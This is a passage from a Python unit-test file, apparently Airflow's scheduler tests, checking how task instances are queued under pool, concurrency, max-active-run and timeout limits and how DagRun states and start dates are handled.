states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti_no_dagrun.key, res_keys)
self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
task_id_1 = 'dummy'
task_id_2 = 'dummydummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, pool='a')
task2 = DummyOperator(dag=dag, task_id=task_id_2, pool='b')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
tis = ([
TI(task1, dr1.execution_date),
TI(task2, dr1.execution_date),
TI(task1, dr2.execution_date),
TI(task2, dr2.execution_date)
])
for ti in tis:
ti.state = State.SCHEDULED
session.merge(ti)
pool = models.Pool(pool='a', slots=1, description='haha')
pool2 = models.Pool(pool='b', slots=100, description='haha')
session.add(pool)
session.add(pool2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(3, len(res))
res_keys = []
for ti in res:
res_keys.append(ti.key)
self.assertIn(tis[0].key, res_keys)
self.assertIn(tis[1].key, res_keys)
self.assertIn(tis[3].key, res_keys)
def test_find_executable_task_instances_none(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
session.commit()
self.assertEqual(0, len(scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)))
def test_find_executable_task_instances_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.RUNNING
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti2.key, res_keys)
ti2.state = State.RUNNING
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
def test_find_executable_task_instances_task_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
task_id_1 = 'dummy'
task_id_2 = 'dummy2'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1_1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1_1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti2.state = State.RUNNING
ti1_2 = TI(task1, dr2.execution_date)
ti1_2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.merge(ti1_2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
ti1_2.state = State.RUNNING
ti1_3 = TI(task1, dr3.execution_date)
ti1_3.state = State.SCHEDULED
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
ti1_1.state = State.SCHEDULED
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
res = scheduler._change_state_for_executable_task_instances([], [State.NONE], session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_no_tis_with_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.RUNNING],
session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_none_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.QUEUED
ti3.state = State.NONE
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.NONE, State.SCHEDULED],
session)
self.assertEqual(2, len(res))
ti1.refresh_from_db()
ti3.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
self.assertEqual(State.QUEUED, ti3.state)
def test_enqueue_task_instances_with_queued_state(self):
dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
session.merge(ti1)
session.commit()
with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti1])
mock_queue_command.assert_called()
def test_execute_task_instances_nothing(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = SimpleDagBag([])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti1.state = State.SCHEDULED
session.merge(ti1)
session.commit()
self.assertEqual(0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
def test_execute_task_instances(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_nonexistent_queue'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
# create first dag run with 1 running and 1 queued
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.RUNNING
ti2.state = State.RUNNING
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(State.RUNNING, dr1.state)
self.assertEqual(2, DAG.get_num_task_instances(dag_id, dag.task_ids,
states=[State.RUNNING], session=session))
# create second dag run
dr2 = scheduler.create_dag_run(dag)
ti3 = TI(task1, dr2.execution_date)
ti4 = TI(task2, dr2.execution_date)
ti3.refresh_from_db()
ti4.refresh_from_db()
# manually set to scheduled so we can pick them up
ti3.state = State.SCHEDULED
ti4.state = State.SCHEDULED
session.merge(ti3)
session.merge(ti4)
session.commit()
self.assertEqual(State.RUNNING, dr2.state)
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
# check that concurrency is respected
ti1.refresh_from_db()
ti2.refresh_from_db()
ti3.refresh_from_db()
ti4.refresh_from_db()
self.assertEqual(3, DAG.get_num_task_instances(dag_id, dag.task_ids,
states=[State.RUNNING, State.QUEUED], session=session))
self.assertEqual(State.RUNNING, ti1.state)
self.assertEqual(State.RUNNING, ti2.state)
six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_2'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
scheduler.max_tis_per_query = 3
session = settings.Session()
tis = []
for i in range(0, 4):
dr = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr.execution_date)
ti2 = TI(task2, dr.execution_date)
tis.append(ti1)
tis.append(ti2)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.commit()
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
self.assertEqual(8, res)
for ti in tis:
ti.refresh_from_db()
self.assertEqual(State.QUEUED, ti.state)
def test_change_state_for_tis_without_dagrun(self):
dag = DAG(
dag_id='test_change_state_for_tis_without_dagrun',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag2 = DAG(
dag_id='test_change_state_for_tis_without_dagrun_dont_change',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag2,
owner='airflow')
dag3 = DAG(
dag_id='test_change_state_for_tis_without_dagrun_no_dagrun',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag3,
owner='airflow')
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id='dummy', session=session)
ti.state = State.SCHEDULED
session.commit()
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.state = State.SCHEDULED
session.commit()
ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
ti3.state = State.SCHEDULED
session.merge(ti3)
session.commit()
dagbag = self._make_simple_dag_bag([dag, dag2, dag3])
scheduler = SchedulerJob(num_runs=0, run_duration=0)
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti = dr.get_task_instance(task_id='dummy', session=session)
ti.refresh_from_db(session=session)
self.assertEqual(ti.state, State.SCHEDULED)
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
ti3.refresh_from_db(session=session)
self.assertEquals(ti3.state, State.NONE)
dr.refresh_from_db(session=session)
dr.state = State.FAILED
# why o why
session.merge(dr)
session.commit()
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti.refresh_from_db(session=session)
self.assertEqual(ti.state, State.NONE)
# don't touch ti2
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
def test_execute_helper_reset_orphaned_tasks(self):
session = settings.Session()
dag = DAG(
'test_execute_helper_reset_orphaned_tasks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(1),
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.SCHEDULED
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
ti2.state = State.SCHEDULED
session.commit()
processor = mock.MagicMock()
processor.get_last_finish_time.return_value = None
scheduler = SchedulerJob(num_runs=0, run_duration=0)
executor = TestExecutor()
scheduler.executor = executor
scheduler._execute_helper(processor_manager=processor)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, State.NONE)
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
@provide_session
def evaluate_dagrun(
self,
dag_id,
expected_task_states, # dict of task_id: state
dagrun_state,
run_kwargs=None,
advance_execution_date=False,
session=None):
"""
Helper for testing DagRun states with simple two-task DAGS.
This is hackish: a dag run is created but its tasks are
run by a backfill.
"""
if run_kwargs is None:
run_kwargs = {}
scheduler = SchedulerJob(**self.default_scheduler_args)
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
if advance_execution_date:
# run a second time to schedule a dagrun after the start_date
dr = scheduler.create_dag_run(dag)
ex_date = dr.execution_date
try:
dag.run(start_date=ex_date, end_date=ex_date, **run_kwargs)
except AirflowException:
pass
# test tasks
for task_id, expected_state in expected_task_states.items():
task = dag.get_task(task_id)
ti = TI(task, ex_date)
ti.refresh_from_db()
self.assertEqual(ti.state, expected_state)
# load dagrun
dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
dr = dr[0]
dr.dag = dag
self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
"""
DagRuns with one failed and one incomplete root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_fail',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.UPSTREAM_FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_success(self):
"""
DagRuns with one failed and one successful root task -> SUCCESS
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_success',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.SUCCESS,
},
dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
"""
DagRuns with one successful and one failed root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_root_fail',
expected_task_states={
'test_dagrun_succeed': State.SUCCESS,
'test_dagrun_fail': State.FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_root_fail_unfinished(self):
"""
DagRuns with one unfinished and one failed root task -> RUNNING
"""
# Run both the failed and successful tasks
scheduler = SchedulerJob(**self.default_scheduler_args)
dag_id = 'test_dagrun_states_root_fail_unfinished'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
try:
dag.run(start_date=dr.execution_date, end_date=dr.execution_date)
except AirflowException: # Expect an exception since there is a failed task
pass
# Mark the successful task as never having run since we want to see if the
# dagrun will be in a running state despite haveing an unfinished task.
session = settings.Session()
ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
ti.state = State.NONE
session.commit()
dr_state = dr.update_state()
self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
"""
DagRun is marked a success if ignore_first_depends_on_past=True
Test that an otherwise-deadlocked dagrun is marked as a success
if ignore_first_depends_on_past=True and the dagrun execution_date
is after the start_date.
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
advance_execution_date=True,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_dagrun_deadlock_ignore_depends_on_past(self):
"""
Test that ignore_first_depends_on_past doesn't affect results
(this is the same test as
test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
that start_date == execution_date so depends_on_past is irrelevant).
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_scheduler_start_date(self):
"""
Test that the scheduler respects start_dates, even when DAGS have run
"""
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > DEFAULT_DATE)
scheduler = SchedulerJob(dag_id,
num_runs=2,
**self.default_scheduler_args)
scheduler.run()
# zero tasks ran
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
# previously, running this backfill would kick off the Scheduler
# because it would take the most recent run and start from there
# That behavior still exists, but now it will only do so if after the
# start date
backfill = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
backfill.run()
# one task ran
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
scheduler = SchedulerJob(dag_id,
num_runs=2,
**self.default_scheduler_args)
scheduler.run()
# still one task
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_scheduler_multiprocessing(self):
"""
Test that the scheduler can successfully queue multiple dags in parallel
"""
dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
for dag_id in dag_ids:
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
file_process_interval=0,
processor_poll_interval=0.5,
num_runs=2)
scheduler.run()
# zero tasks ran
dag_id = 'test_start_date_scheduling'
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
"""
Test if the scheduler does not create multiple dagruns
if a dag is scheduled with @once and a start_date
"""
dag = DAG(
'test_scheduler_dagrun_once',
start_date=timezone.datetime(2015, 1, 1),
schedule_interval="@once")
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_process_task_instances(self):
"""
Test if _process_task_instances puts the right task instances into the
queue.
"""
dag = DAG(
dag_id='test_scheduler_process_execute_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = mock.Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE)
)
def test_scheduler_do_not_schedule_removed_task(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
queue = mock.Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_schedule_too_early(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_too_early',
start_date=timezone.datetime(2200, 1, 1))
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
queue = mock.Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_run_finished(self):
dag = DAG(
dag_id='test_scheduler_do_not_run_finished',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = State.SUCCESS
session.commit()
session.close()
queue = mock.Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_add_new_task(self):
"""
Test if a task instance will be added if the dag is updated
"""
dag = DAG(
dag_id='test_scheduler_add_new_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances()
self.assertEquals(len(tis), 1)
dag_task2 = DummyOperator(
task_id='dummy2',
dag=dag,
owner='airflow')
queue = mock.Mock()
scheduler._process_task_instances(dag, queue=queue)
tis = dr.get_task_instances()
self.assertEquals(len(tis), 2)
def test_scheduler_verify_max_active_runs(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs has been reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_fail_dagrun_timeout(self):
"""
Test if a a dagrun wil be set failed if timeout
"""
dag = DAG(
dag_id='test_scheduler_fail_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.dagrun_timeout = datetime.timedelta(seconds=60)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
dr2 = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr2)
dr.refresh_from_db(session=session)
self.assertEquals(dr.state, State.FAILED)
def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs has been reached and dagrun_timeout is not reached
Test if a a dagrun will be scheduled if max_dag_runs has been reached but dagrun_timeout is also reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag.dagrun_timeout = datetime.timedelta(seconds=60)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
# Should not be scheduled as DagRun has not timedout and max_active_runs is reached
new_dr = scheduler.create_dag_run(dag)
self.assertIsNone(new_dr)
# Should be scheduled as dagrun_timeout has passed
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
new_dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(new_dr)
def test_scheduler_max_active_runs_respected_after_clear(self):
"""
Test if _process_task_instances only schedules ti's up to max_active_runs
(related to issue AIRFLOW-137)
"""
dag = DAG(
dag_id='test_scheduler_max_active_runs_respected_after_clear',
start_date=DEFAULT_DATE)
dag.max_active_runs = 3
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
# First create up to 3 dagruns in RUNNING state.
scheduler.create_dag_run(dag)
# Reduce max_active_runs to 1
dag.max_active_runs = 1
queue = mock.Mock()
# and schedule them in, so we can check how many
# tasks are put on the queue (should be one, not 3)
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE)
)
@patch.object(TI, 'pool_full')
def test_scheduler_verify_pool_full(self, mock_pool_full):
"""
Test task instances not queued when pool is full
"""
mock_pool_full.return_value = False
dag = DAG(
dag_id='test_scheduler_verify_pool_full',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
pool='test_scheduler_verify_pool_full')
session = settings.Session()
pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
session.add(pool)
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
# Create 2 dagruns, which will create 2 task instances.
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, DEFAULT_DATE)
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = []
scheduler._process_task_instances(dag, queue=queue)
self.assertEquals(len(queue), 2)
dagbag = self._make_simple_dag_bag([dag])
# Recreated part of the scheduler here, to kick off tasks -> executor
for ti_key in queue:
task = dag.get_task(ti_key[1])
ti = TI(task, ti_key[2])
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
session.merge(ti)
session.commit()
scheduler._execute_task_instances(dagbag,
(State.SCHEDULED,
State.UP_FOR_RETRY))
self.assertEquals(len(scheduler.executor.queued_tasks), 1)
def test_scheduler_auto_align(self):
"""
Test if the schedule_interval will be auto aligned with the start_date
such that if the start_date coincides with the schedule the first
execution_date will be start_date, otherwise it will be start_date +
interval.
"""
dag = DAG(
dag_id='test_scheduler_auto_align_1',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="4 5 * * *"
)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))
dag = DAG(
dag_id='test_scheduler_auto_align_2',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="10 10 * * *"
)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
